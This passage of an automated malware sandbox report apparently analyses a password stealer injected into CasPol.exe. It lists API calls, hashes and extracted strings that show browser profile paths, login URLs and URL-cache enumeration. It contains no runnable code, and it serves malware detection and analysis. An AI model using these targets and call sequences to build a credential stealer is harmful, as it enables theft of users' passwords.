                                                                                                                                                                          • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                                                                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 716 41837f-4183bf 717 4183c1-4183cc call 418197 716->717 718 4183dc-4183ec call 418160 716->718 723 4183d2-4183d8 717->723 724 418517-41851d 717->724 725 4183f6-41840b 718->725 726 4183ee-4183f1 718->726 723->718 727 418417-418423 725->727 728 41840d-418415 725->728 726->724 729 418427-418442 call 41739b 727->729 728->729 732 418444-41845d CreateFileW 729->732 733 41845f-418475 CreateFileA 729->733 734 418477-41847c 732->734 733->734 735 4184c2-4184c7 734->735 736 41847e-418495 GetLastError free 734->736 739 4184d5-418501 memset call 418758 735->739 740 4184c9-4184d3 735->740 737 4184b5-4184c0 call 444706 736->737 738 418497-4184b3 call 41837f 736->738 737->724 738->724 746 418506-418515 free 739->746 740->739 746->724
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                          • String ID: |A
                                                                                                                                                                          • API String ID: 77810686-1717621600
                                                                                                                                                                          • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                          • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 747 40d134-40d13b 748 40d142-40d14e 747->748 749 40d13d call 40d092 747->749 750 40d160 748->750 751 40d150-40d159 748->751 749->748 755 40d162-40d164 750->755 753 40d15b-40d15e 751->753 754 40d18d-40d19f 751->754 753->750 753->751 754->755 756 40d295 755->756 757 40d16a-40d170 755->757 760 40d297-40d299 756->760 758 40d1a1-40d1a9 757->758 759 40d172-40d18b GetModuleHandleW 757->759 762 40d1f8-40d206 call 40d29a 758->762 763 40d1ab-40d1cb wcscpy call 40d626 758->763 761 40d20b-40d214 LoadStringW 759->761 764 40d216 761->764 762->761 771 40d1cd-40d1dd wcslen 763->771 772 40d1df-40d1f6 GetModuleHandleW 763->772 767 40d218-40d227 764->767 768 40d28e-40d293 764->768 767->768 770 40d229-40d235 767->770 768->760 770->768 773 40d237-40d28c memcpy 770->773 771->764 771->772 772->761 773->756 773->768
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                          • String ID: strings
                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                          • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                          • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                                                                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                          • String ID: BIN
                                                                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                          • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                          • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                          • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                          • memset.MSVCRT ref: 00403D13
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                          • API String ID: 4039892925-11920434
                                                                                                                                                                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                                                                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                          • API String ID: 4039892925-3369679110
                                                                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                          • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                          • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                          • Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                          • Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
